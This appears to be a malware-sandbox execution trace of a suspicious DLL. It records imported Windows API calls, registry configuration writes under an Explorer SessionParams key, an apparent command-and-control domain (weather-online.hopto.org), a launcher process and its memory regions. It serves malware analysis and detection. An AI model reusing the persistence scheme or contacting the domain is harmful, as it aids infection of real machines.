[0035.679] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.679] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.679] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.679] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.680] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.681] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.681] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.681] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.681] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.681] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.681] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.681] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.681] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.681] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.682] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.682] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.682] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.682] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.682] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.682] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.682] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.682] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.682] AddAtomT () returned 0x0 [0035.682] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x16f954, lpdwDisposition=0x16f958 | out: phkResult=0x16f954*=0x78, lpdwDisposition=0x16f958*=0x2) returned 0x0 [0035.682] CloseHandle (hObject=0x78) returned 1 [0035.682] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0035.682] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x16f9a0, lpdwDisposition=0x16fa58 | out: phkResult=0x16f9a0*=0x7c, lpdwDisposition=0x16fa58*=0x2) returned 0x0 [0035.682] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1ed94, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.682] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1ed98, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1ed9c, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1eda4, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1eda8, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1eda8*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1edb8, lpcbData=0x16f99c*=0x8 | out: lpType=0x16f9a4*=0x3, lpData=0x72f1edb8*, lpcbData=0x16f99c*=0x8) returned 0x0 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1edc0, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x4, lpData=0x72f1edc0*=0x1, lpcbData=0x16f99c*=0x4) returned 0x0 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1edc4, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1edc8, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x4, lpData=0x72f1edc8*=0xe10, lpcbData=0x16f99c*=0x4) returned 0x0 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1edcc, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x16f99c*=0x4) returned 0x0 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1edd0, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x16f99c*=0x4) returned 0x0 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1eddc, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x16f9a4, lpData=0x7e0b28, lpcbData=0x16f99c*=0x200 | out: lpType=0x16f9a4*=0x0, lpData=0x7e0b28*=0x0, lpcbData=0x16f99c*=0x200) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1eef0, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x16f9a4, lpData=0x7e0d30, lpcbData=0x16f99c*=0x64 | out: lpType=0x16f9a4*=0x3, lpData=0x7e0d30*, lpcbData=0x16f99c*=0x2) returned 0x0 [0035.683] lstrlenA (lpString=" ") returned 1 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1edec, lpcbData=0x16f99c*=0x104 | out: lpType=0x16f9a4*=0x3, lpData=0x72f1edec*, lpcbData=0x16f99c*=0x0) returned 0x0 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1eef4, lpcbData=0x16f99c*=0x8 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x16f99c*=0x8) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1eefc, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1ef00, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x16f9a4, lpData=0x72f1eda0, lpcbData=0x16f99c*=0x4 | out: lpType=0x16f9a4*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x16f99c*=0x4) returned 0x2 [0035.683] RegCloseKey (hKey=0x7c) returned 0x0 [0035.683] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16fa60 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16fa60*=0x2) returned 0x0 [0035.683] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72f1edc8*=0x1c20, cbData=0x4 | out: lpData=0x72f1edc8*=0x1c20) returned 0x0 [0035.684] GetLastError () returned 0x0 [0035.684] RegCloseKey (hKey=0x7c) returned 0x0 [0035.684] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16fa70 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16fa70*=0x2) returned 0x0 [0035.684] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72f1edc0*=0x0, cbData=0x4 | out: lpData=0x72f1edc0*=0x0) returned 0x0 [0035.684] RegCloseKey (hKey=0x7c) returned 0x0 [0035.684] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16fa60 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16fa60*=0x2) returned 0x0 [0035.684] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72f1edcc*=0x0, cbData=0x4 | out: lpData=0x72f1edcc*=0x0) returned 0x0 [0035.684] RegCloseKey (hKey=0x7c) returned 0x0 [0035.684] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16fa5c | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16fa5c*=0x2) returned 0x0 [0035.684] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72f1edd0*=0x1, cbData=0x4 | out: lpData=0x72f1edd0*=0x1) returned 0x0 [0035.684] RegCloseKey (hKey=0x7c) returned 0x0 [0035.684] GetLastError () returned 0x0 [0035.684] GetLastError () returned 0x0 [0035.684] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0035.684] lstrlenA (lpString="00") returned 2 [0035.684] lstrlenA (lpString="/00/") returned 4 [0035.684] wsprintfA (in: param_1=0x7e0da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0035.684] wsprintfA (in: param_1=0x7e0dc8, param_2="%s" | out: param_1="00") returned 2 [0035.684] wsprintfA (in: param_1=0x7e26e8, param_2="%s" | out: param_1="/00/") returned 4 [0035.685] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0035.685] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0035.685] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16fa5c | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16fa5c*=0x2) returned 0x0 [0035.685] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x7e0d30*, cbData=0x64 | out: lpData=0x7e0d30*) returned 0x0 [0035.685] RegCloseKey (hKey=0x7c) returned 0x0 [0035.686] HeapDestroy (hHeap=0x7e0000) returned 1 Process: id = "60" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb80" os_pid = "0xd5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2628 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2629 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2630 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2631 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2632 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2633 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2634 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2635 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2636 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2637 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2638 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2639 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2640 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2641 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2642 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2643 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2644 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2645 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2646 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2647 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2648 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2649 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2650 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2651 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2652 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2653 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2654 start_va = 0x480000 end_va = 0x547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2655 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2656 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2657 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2658 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2659 start_va = 0x550000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2660 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 2661 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2662 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2663 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2664 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2665 start_va = 0xd0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2666 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2667 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2668 start_va = 0x660000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Thread: id = 126 os_tid = 0xd60 [0035.724] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f6f4 | out: lpSystemTimeAsFileTime=0x22f6f4*(dwLowDateTime=0xe2fb9530, dwHighDateTime=0x1d3dfba)) [0035.724] GetCurrentProcessId () returned 0xd5c [0035.724] GetCurrentThreadId () returned 0xd60 [0035.724] GetTickCount () returned 0x180e2 [0035.724] QueryPerformanceCounter (in: lpPerformanceCount=0x22f6ec | out: lpPerformanceCount=0x22f6ec*=375369673) returned 1 [0035.725] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.725] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.725] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.725] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.725] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.725] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.725] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.726] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.726] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.726] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.726] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.726] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.726] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.727] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.727] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.727] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.727] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.727] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.727] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.727] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.727] GetCurrentThreadId () returned 0xd60 [0035.727] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"iexplore.exe\"" [0035.727] GetEnvironmentStringsW () returned 0x3979b8* [0035.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 